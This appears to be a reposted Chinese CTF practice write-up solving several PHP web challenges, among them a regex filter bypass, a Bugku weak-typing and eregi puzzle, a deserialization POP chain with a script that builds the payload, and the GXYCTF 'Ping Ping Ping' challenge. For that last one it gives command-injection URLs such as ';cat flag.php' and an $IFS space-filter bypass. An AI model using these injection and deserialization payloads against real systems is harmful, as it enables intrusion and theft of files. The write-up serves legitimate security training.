周練4
阿新 • • 發佈:2022-05-07
------------恢復內容開始------------
No one knows regex better than me
<?php error_reporting(0); $zero=$_REQUEST['zero']; $first=$_REQUEST['first']; $second=$zero.$first; if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){ $key=$second; //zero和first中包含其中任一 if(preg_match("/\.\.|flag/",$key)){ //zero和first中不包含flag die("Noooood hacker!"); }else{ $third=$first; //字元>/>| if(preg_match("/\\|\056\160\150\x70/i",$third)){ //first包含|.php $end=substr($third,5); //擷取五位後的字元 highlight_file(base64_decode($zero).$end);//maybe flag in flag.php } //base64解碼 } } else{ highlight_file(__FILE__); }
first=abcd|.php&zero=ZmxhZw==
never_give_up
%3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--%3E
";if(!$_GET['id'])//如果id=0或無法通過get獲得id變數{ //header() 函式向客戶端傳送或更改原始的 HTTP 報頭 header('Location: hello.php?id=1');//跳轉到hello.php檔案且設定id=1exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')){ //$a檔案中不能有.echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r'); //把整個檔案讀入一個字串中 if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) { //弱型別比較 //b的長度大於5 //eregi截斷漏洞 require("f4l2a3g.txt"); } else { print "never never never give up !!!"; } ?>
stripos() 函式查詢字串在另一字串中第一次出現的位置(不區分大小寫)如果沒有找到字串則返回 FALSE
strripos() - 查詢字串在另一字串中最後一次出現的位置(不區分大小寫)
strpos() - 查詢字串在另一字串中第一次出現的位置(區分大小寫)
strrpos() - 查詢字串在另一字串中最後一次出現的位置(區分大小寫)
Pop2022
<?php if(isset($_GET['wish'])){ @unserialize($_GET['wish']); } else{ $a=new Road_is_Long; highlight_file(__FILE__); } /***************************pop your 2022*****************************/ class Road_is_Long{ public $page; public $string; public function __construct($file='index.php'){ $this->page = $file; } public function __toString(){ return $this->string->page; //3. _get } public function __wakeup(){ if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) //4. __toString()
echo "You can Not Enter 2022"; $this->page = "index.php"; } } } class Try_Work_Hard{ protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); //1. 目標 } } class Make_a_Change{ public $effort; public function __construct(){ $this->effort = array(); } public function __get($key){ $function = $this->effort; return $function(); //2. __invoke() } } /**********************Try to See flag.php*****************************/
<?php class Try_Work_Hard{ protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php'; } class Road_is_Long{ public $page; public $string; } class Make_a_Change{ public $effort; } $a = new Road_is_Long(); $b = new Road_is_Long(); $c = new Make_a_Change(); $d = new Try_Work_Hard(); $a -> page = $b; $b -> string = $c; $c -> effort = $d; echo urlencode(serialize($a));
[GXYCTF2019]Ping Ping Ping1
1/?ip=223.90.190.171;ls /
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1|ls
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1;cat flag.php
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1;a=g;cat$IFS$9fla$a.php